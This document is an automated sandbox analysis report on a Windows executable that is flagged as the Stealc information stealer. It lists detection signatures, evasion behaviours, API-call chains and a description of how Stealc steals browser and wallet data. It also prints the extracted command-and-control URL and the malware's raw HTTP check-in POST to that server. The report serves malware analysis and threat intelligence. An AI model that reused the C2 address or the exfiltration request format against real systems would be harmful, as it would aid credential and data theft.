Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1560054
MD5:88d9a99ca46e751ab8202680c23046f3
SHA1:dcba4b2d61dc2e695d2f0d6c4e4011cfd66d547f
SHA256:16503ad13cedbcd3a80af81e25a871ef01ca4606fa2e61f3960924fd2c000ee4
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 88D9A99CA46E751AB8202680C23046F3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000003.1342030048.00000000054D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7408JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7408JoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-21T11:03:20.179542+010020442431Malware Command and Control Activity Detected192.168.2.749707185.215.113.20680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: http://185.215.113.206/c4becf79229cb002.phpftAvira URL Cloud: Label: malware
              Source: 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
              Source: file.exeReversingLabs: Detection: 39%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B04C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00B04C50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_00B240B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00B060D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B16960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_00B16960
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,1_2_00B0EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B09B80 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00B09B80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B09B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00B09B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B16B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_00B16B79
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B07750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00B07750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B13910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B13910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B1E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B11269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B11269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B11250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B11250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B12390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_00B12390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B0DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B0DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B0DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B1CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B14B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B14B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B14B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B14B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_00B1DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B1D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00B1D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00B016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_00B016A0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49707 -> 185.215.113.206:80
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 43 43 33 38 37 45 36 37 43 39 33 32 37 33 31 37 38 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="hwid"688CC387E67C932731780------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="build"mars------GDBAKEGIDBGIEBFHDHJJ--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B04C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00B04C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKEGIDBGIEBFHDHJJHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 38 43 43 33 38 37 45 36 37 43 39 33 32 37 33 31 37 38 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 45 47 49 44 42 47 49 45 42 46 48 44 48 4a 4a 2d 2d 0d 0a Data Ascii: ------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="hwid"688CC387E67C932731780------GDBAKEGIDBGIEBFHDHJJContent-Disposition: form-data; name="build"mars------GDBAKEGIDBGIEBFHDHJJ--
              Source: file.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1383935885.00000000018E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8
              Source: file.exe, 00000001.00000002.1383935885.000000000185E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpft
              Source: file.exe, 00000001.00000002.1383935885.00000000018BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phph
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B09770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,1_2_00B09770

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B248B01_2_00B248B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB28AE1_2_00EB28AE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC005A1_2_00EC005A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E328261_2_00E32826
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DA68341_2_00DA6834
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC69B31_2_00EC69B3
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00DA1AD51_2_00DA1AD5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC1AA91_2_00EC1AA9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EBCA681_2_00EBCA68
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB7BBB1_2_00EB7BBB
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EAF3BD1_2_00EAF3BD
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E8E4791_2_00E8E479
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00D71C741_2_00D71C74
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EC34291_2_00EC3429
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB440C1_2_00EB440C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00EB0D741_2_00EB0D74
